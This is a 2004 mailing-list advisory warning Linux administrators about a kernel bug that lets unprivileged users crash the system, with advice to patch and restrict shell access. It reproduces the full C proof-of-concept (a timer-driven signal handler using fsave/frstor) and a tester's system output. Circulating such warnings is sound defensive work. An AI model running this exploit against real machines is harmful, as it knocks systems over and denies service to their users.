To whom it may concern - forward to your Linux admins,

Because of a security bug inside the Linux kernel I blocked shell access at the moment for several users. You can test this exploit on your own machine:
http://linuxreviews.org/news/2004-06-11_kernel_crash/#toc1

Inside the Marc mailing list archive this bug was noticed with a mail from 2004-06-09 ~10 pm. The critical point is that it's possible to kill the system without having root rights. There are some patches available. But my security advice is at the moment to follow the discussion and to stop shell access. On running productive machines we have some time.

Pay attention to this C code:
http://linuxreviews.org/news/2004-06-11_kernel_crash/crash.c.txt

    #include <sys/time.h>
    #include <signal.h>
    #include <unistd.h>

    /* SIGALRM handler: save and restore the x87 FPU state around a write */
    static void Handler(int ignore)
    {
        char fpubuf[108];
        __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
        write(2, "*", 1);
        __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
    }

    int main(int argc, char *argv[])
    {
        struct itimerval spec;
        signal(SIGALRM, Handler);
        /* fire the real-time timer every 100 microseconds */
        spec.it_interval.tv_sec = 0;
        spec.it_interval.tv_usec = 100;
        spec.it_value.tv_sec = 0;
        spec.it_value.tv_usec = 100;
        setitimer(ITIMER_REAL, &spec, NULL);
        while (1)
            write(1, ".", 1);
        return 0;
    }

#####

Inside the discussion people wrote that for UML (User Mode Linux) the code is also malicious. I couldn't verify it. But I suggest to check it carefully and also block UML users from shell access.

#####

Some users wrote that they tested it and they are unable to kill the process :-)

    castor:~ # uname -a
    Linux castor 2.6.7-rc3 #1 SMP Mon Jun 7 23:57:07 CEST 2004 i686 Intel(R) Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux

(Hyperthreading) top shows

    top - 02:13:43 up 4 days, 10:25, 1 user, load average: 3.95, 4.03, 2.60
    Tasks: 112 total, 5 running, 107 sleeping, 0 stopped, 0 zombie
    Cpu0 : 57.8% us, 2.3% sy, 0.0% ni, 39.9% id, 0.0% wa, 0.0% hi, 0.0% si
    Cpu1 : 0.0% us, 100.0% sy, 0.0% ni, 0.0% id, 0.0% wa, 0.0% hi, 0.0% si

There is no reason to panic.
Sysadmins: just follow the discussion and patch your system. If you don't need a patch, because you don't allow shell access for users: review your own risk management inside your organisation for internal quality management.

--
With kind regards
Wilfried Goedert
mailto:[EMAIL PROTECTED]

_______________________________________________
Care2002-developers mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/care2002-developers